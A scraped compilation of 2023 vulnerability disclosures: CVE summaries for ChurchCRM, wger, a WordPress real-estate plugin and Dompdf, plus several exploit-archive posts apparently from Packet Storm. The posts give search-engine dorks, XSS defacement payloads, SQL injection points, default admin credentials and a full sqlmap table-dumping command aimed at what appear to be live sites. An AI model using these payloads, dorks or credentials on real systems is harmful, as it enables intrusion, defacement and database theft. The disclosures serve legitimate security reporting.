The Real Estate Manager plugin for WordPress is vulnerable to privilege escalation in versions up to, and including, 6.7.1 due to insufficient restriction on the 'rem_save_profile_front' function. This makes it possible for authenticated attackers, with minimal permissions such as a subscriber, to modify their user role by supplying the 'wp_capabilities' parameter during a profile update.

CVE-2023-4239: shortcodes.class.php in real-estate-manager/tags/6.7.1/classes – WordPress Plugin Repository

social-media-skeleton is an uncompleted social media project implemented using PHP, MySQL, CSS, JavaScript, and HTML. Versions 1.0.0 until 1.0.3 have a stored cross-site scripting vulnerability. The problem is patched in v1.0.3.


**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2023-39518: Fix XSS issue by M0ck3d · Pull Request #4 · fobybus/social-media-skeleton

SQL injection vulnerability in ChurchCRM v.5.0.0 allows a remote attacker to obtain sensitive information via the volopp1 and volopp2 parameters within the /QueryView.php.

**CVE-Disclosures**

Welcome to the CVE disclosures section of this repository! Here, you'll find a list of security vulnerabilities that I have discovered while working on Free Open Source Software (FOSS) applications.

**CVEs I Have Discovered**

Findings

Description

CVE-2023-38758

A stored cross-site scripting (XSS) vulnerability in wger Workout Manager v2.2.0a3 allows remote attackers to inject arbitrary web script or HTML via the license_author parameter of the /en/nutrition/ingredient/add/ endpoint.

CVE-2023-38759

A cross-site request forgery (CSRF) vulnerability in wger Workout Manager v2.2.0a3 allows remote attackers to gain privileges via email change and password reset functionality at /en/user/preferences, /en/gym/user/1/reset-user-password, and /en/user/password/reset/. These attack vectors can allow any account to be compromised, with resulting data exfiltrated back to the attacker's server.

CVE-2023-38760

A SQL injection vulnerability in ChurchCRM v.5.0.0 allows a remote attacker to obtain sensitive database information via the role and gender parameters within the /QueryView.php?QueryID=7 endpoint (Person by Role and Gender query). This can be used for information disclosure of anything in the database, including user credentials.

CVE-2023-38761

A cross site scripting (XSS) vulnerability in ChurchCRM v5.0.0 allows remote attackers to inject arbitrary web script or HTML via a crafted payload to the systemSettings.php endpoint. This payload is placed within the site header and is triggered whenever anyone authenticated views any page. This vulnerability can be used to execute arbitrary JavaScript code within the victim's session, perform information disclosure, or potentially perform other CSRF attacks.

CVE-2023-38762

A SQL injection vulnerability in ChurchCRM v.5.0.0 allows a remote attacker to obtain sensitive database information via the friendmonths parameter within the /QueryView.php?QueryID=26 endpoint (Recent Friends query). This can be used for information disclosure of anything in the database, including user credentials.

CVE-2023-38763

A SQL injection vulnerability in ChurchCRM v.5.0.0 allows an authenticated remote attacker to obtain sensitive database information via the FundRaiserID parameter within the /FundRaiserEditor.php endpoint. This can be used for information disclosure of anything in the database, including user credentials.

CVE-2023-38764

A SQL injection vulnerability in ChurchCRM v.5.0.0 allows a remote attacker to obtain sensitive database information via the birthmonth and percls parameters within the /QueryView.php?QueryID=18 endpoint (Birthdays query). This can be used for information disclosure of anything in the database, including user credentials.

CVE-2023-38765

A SQL injection vulnerability in ChurchCRM v.5.0.0 allows a remote attacker to obtain sensitive database information via the membermonth parameter within the /QueryView.php?QueryID=22 endpoint (Membership Anniversaries query). This can be used for information disclosure of anything in the database, including user credentials.

CVE-2023-38766

A cross site scripting (XSS) vulnerability in ChurchCRM v5.0.0 allows remote attackers to inject arbitrary web script or HTML via a crafted payload to the PersonView.php endpoint. An authenticated attacker can perform stored XSS by editing their user profile. This payload is triggered whenever anyone views this user's profile. This vulnerability can be used to execute arbitrary JavaScript code within the victim's session, perform information disclosure, or potentially perform other CSRF attacks.

CVE-2023-38767

A SQL injection vulnerability in ChurchCRM v.5.0.0 allows a remote attacker to obtain sensitive database information via the value and custom parameters within the /QueryView.php?QueryID=200 endpoint (CustomSearch query). This can be used for information disclosure of anything in the database, including user credentials.

CVE-2023-38768

A SQL injection vulnerability in ChurchCRM v.5.0.0 allows a remote attacker to obtain sensitive database information via the PropertyID parameter within the /QueryView.php?QueryID=9 endpoint (Person by Property query). This can be used for information disclosure of anything in the database, including user credentials.

CVE-2023-38769

A SQL injection vulnerability in ChurchCRM v.5.0.0 allows a remote attacker to obtain sensitive database information via the searchstring and searchwhat parameters within the /QueryView.php?QueryID=15 endpoint (Advanced Search query). This can be used for information disclosure of anything in the database, including user credentials.

CVE-2023-38770

A SQL injection vulnerability in ChurchCRM v.5.0.0 allows a remote attacker to obtain sensitive database information via the group parameter within the /QueryView.php?QueryID=21 endpoint (Registered Students query). This can be used for information disclosure of anything in the database, including user credentials.

CVE-2023-38771

A SQL injection vulnerability in ChurchCRM v.5.0.0 allows a remote attacker to obtain sensitive database information via the volopp parameter within the /QueryView.php?QueryID=25 endpoint (Volunteers - 'for a particular opportunity' query). This can be used for information disclosure of anything in the database, including user credentials.

CVE-2023-38773

A SQL injection vulnerability in ChurchCRM v.5.0.0 allows a remote attacker to obtain sensitive database information via the volopp1 and volopp2 parameters within the /QueryView.php?QueryID=100 endpoint (Volunteers - 'who match two specific codes' query). This can be used for information disclosure of anything in the database, including user credentials.

_I will update this list as soon as new vulnerabilities are found and available for public disclosure._

CVE-2023-38773: GitHub - 0x72303074/CVE-Disclosures

Ubuntu Security Notice 6277-1 - It was discovered that Dompdf was not properly validating untrusted input when processing HTML content under certain circumstances. An attacker could possibly use this issue to expose sensitive information or execute arbitrary code. This issue only affected Ubuntu 16.04 LTS. It was discovered that Dompdf was not properly validating processed HTML content that referenced PHAR files, which could result in the deserialization of untrusted data. An attacker could possibly use this issue to execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-6277-1August 08, 2023php-dompdf vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTS- Ubuntu 18.04 LTS (Available with Ubuntu Pro)- Ubuntu 16.04 LTS (Available with Ubuntu Pro)Summary:Several security issues were fixed in Dompdf.Software Description:- php-dompdf: HTML to PDF converterDetails:It was discovered that Dompdf was not properly validating untrusted input whenprocessing HTML content under certain circumstances. An attacker couldpossibly use this issue to expose sensitive information or execute arbitrarycode. This issue only affected Ubuntu 16.04 LTS.(CVE-2014-5011, CVE-2014-5012, CVE-2014-5013)It was discovered that Dompdf was not properly validating processed HTMLcontent that referenced PHAR files, which could result in the deserializationof untrusted data. An attacker could possibly use this issue to executearbitrary code. (CVE-2021-3838)It was discovered that Dompdf was not properly validating processed HTMLcontent that referenced both a remote base and a local file, which couldresult in the bypass of a chroot check. An attacker could possibly use thisissue to expose sensitive information. (CVE-2022-2400)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS:php-dompdf 0.6.2+dfsg-3ubuntu0.20.04.1Ubuntu 18.04 LTS (Available with Ubuntu Pro):php-dompdf 0.6.2+dfsg-3ubuntu0.18.04.1~esm1Ubuntu 16.04 LTS (Available with Ubuntu Pro):php-dompdf 0.6.1+dfsg-2ubuntu1+esm1In general, a standard system update will make all the necessary changes.References:https://ubuntu.com/security/notices/USN-6277-1CVE-2014-5011, CVE-2014-5012, CVE-2014-5013, CVE-2021-3838,CVE-2022-2400Package Information:https://launchpad.net/ubuntu/+source/php-dompdf/0.6.2+dfsg-3ubuntu0.20.04.1

Ubuntu Security Notice USN-6277-1

Video Whisper Conference version 1.01 suffers from a cross site scripting vulnerability.

    ============================================================================| # Title     : video whisper conference v1.01 XSS Vulnerability           || # Author    : indoushka                                                  || # Tested on : windows 10 Français V.(Pro)                                || # Vendor    : https://www.videowhisper.com/demos/conference/             |  | # Dork      : "Video Conference by VideoWhisper.com"                     |============================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] use payload : indoushka<acx><marquee><font color=lime size=32>indoushka</font></marquee>[+] https://wwvideowhispercom/demos/conference/index.php?r=indoushka<acx><marquee><font color=lime size=32>Hacked by indoushka</font></marquee>Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

Video Whisper Conference 1.01 Cross Site Scripting

Videoflix CMS version 1.3 appears to leave default credentials installed after installation.

    ====================================================================================================================================| # Title     : Videoflix Cms v1.3 Insecure Settings Vulnerability                                                                 || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro)                                                                                        || # Vendor    : https://codecanyon.net/item/videoflix-tv-series-movie-subscription-portal-cms/20839016                             |  | # Dork      : "Made with by Vmax-Studio."                                                                                        |====================================================================================================================================poc : [+] Dorking İn Google Or Other Search Enggine .[+] Users : login email : admin@videoflix.com, password : abcdefg [+] http://arabflixcom/index.php?admin/dashboardGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

Videoflix CMS 1.3 Insecure Settings

Virtues cpanelCMS version 1.0 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : Virtues cpanelCMS v1.0 sql injection Vulnerability                                                                 || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             || # Vendor    : http://www.virtues.ag/                                                                                             |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /index/noticia_integra.php?id_clipping=[+] http://wospluralorg/index/noticia_integra.php?id_clipping= inject herGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

Virtues cpanelCMS 1.0 SQL Injection

Voodoo Chat version 1.3 suffers from a cross site scripting vulnerability.

**Voodoo Chat 1.3 Cross Site Scripting**

Posted Aug 8, 2023

Authored by indoushka

Voodoo Chat version 1.3 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 11f7a2efbdf14e9500b0a6e971a896bbac171caeed20cc661f2b4ad1b5c02e2e

Download | Favorite | View

**Voodoo Chat 1.3 Cross Site Scripting**

    ====================================================================================================================================| # Title     : Voodoo Chat v1.3 XSS Vulnerability                                                                                 || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             || # Vendor    : http://www.swalif.net/softs/swalif30/softs258256/#post1850068                                                      |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /pictures.php?action=add&session=1%27%22%28%29%26%25%3CScRiPt%20%3Eprompt%28958119%29%3C/ScRiPt%3E&smile_id=0[+] http://127.0.0.1/groupsyriacom/chat/pictures.php?action=add&session=1%27%22%28%29%26%25%3CScRiPt%20%3Eprompt%28958119%29%3C/ScRiPt%3E&smile_id=0Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,913)
*   Arbitrary (16,188)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,273)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,342)
*   DoS (23,412)
*   Encryption (2,369)
*   Exploit (51,815)
*   File Inclusion (4,221)
*   File Upload (972)
*   Firewall (821)
*   Info Disclosure (2,766)
*   Intrusion Detection (892)
*   Java (3,043)
*   JavaScript (858)
*   Kernel (6,666)
*   Local (14,447)
*   Magazine (586)
*   Overflow (12,690)
*   Perl (1,423)
*   PHP (5,141)
*   Proof of Concept (2,338)
*   Protocol (3,601)
*   Python (1,535)
*   Remote (30,747)
*   Root (3,579)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,639)
*   Security Tool (7,883)
*   Shell (3,180)
*   Shellcode (1,214)
*   Sniffer (894)
*   Spoof (2,206)
*   SQL Injection (16,359)
*   TCP (2,404)
*   Trojan (687)
*   UDP (891)
*   Virus (664)
*   Vulnerability (31,763)
*   Web (9,660)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,921)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,808)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,407)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,704)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,799)
*   UNIX (9,286)
*   UnixWare (186)
*   Windows (6,568)
*   Other

Voodoo Chat 1.3 Cross Site Scripting

eneblur CMS version 1.0 suffers from a remote SQL injection vulnerability.

**eneblur CMS 1.0 SQL Injection**

Posted Aug 8, 2023

Authored by indoushka

eneblur CMS version 1.0 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection

SHA-256 | 4d67639c944054e33175ed2e55a36b45439dd449f6e73134fe454cc1d6a7bb71

Download | Favorite | View

**eneblur CMS 1.0 SQL Injection**

    ====================================================================================================================================| # Title     : eneblur CMS 1.0 SQL injection Vulnerability                                                                        || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 115.0.2(64-bit)                                            | | # Vendor    : https://www.eneblur.com/web-application-development.php                                                            |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /journal_details.php?jid= <===== inject here [+] D:\sqlmap>sqlmap.py -u http://127.0.0.1/wenvirobiotechjournalscom/journal_details.php?jid=3 --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --tables -D envirobi_portal_server3Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,913)
*   Arbitrary (16,188)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,273)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,342)
*   DoS (23,412)
*   Encryption (2,369)
*   Exploit (51,815)
*   File Inclusion (4,221)
*   File Upload (972)
*   Firewall (821)
*   Info Disclosure (2,766)
*   Intrusion Detection (892)
*   Java (3,043)
*   JavaScript (858)
*   Kernel (6,666)
*   Local (14,447)
*   Magazine (586)
*   Overflow (12,690)
*   Perl (1,423)
*   PHP (5,141)
*   Proof of Concept (2,338)
*   Protocol (3,601)
*   Python (1,535)
*   Remote (30,747)
*   Root (3,579)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,639)
*   Security Tool (7,883)
*   Shell (3,180)
*   Shellcode (1,214)
*   Sniffer (894)
*   Spoof (2,206)
*   SQL Injection (16,359)
*   TCP (2,404)
*   Trojan (687)
*   UDP (891)
*   Virus (664)
*   Vulnerability (31,763)
*   Web (9,660)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,921)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,808)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,407)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,704)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,799)
*   UNIX (9,286)
*   UnixWare (186)
*   Windows (6,568)
*   Other

eneblur CMS 1.0 SQL Injection

CMS BMGI International version 4.0 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : CMS BMGI International v 4.0 Sql injection Vulnerability                                                           || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit)                                             || # Vendor    : https://batel.net/                                                                                                 |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] inject here : /_Admin_root/authentification.php?lang=1&pw=1&user=yymfqisv[+] http://127.0.0.1/scimatdz/_Admin_root/authentification.php?lang=1&pw=1&user=yymfqisvGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Tag

#php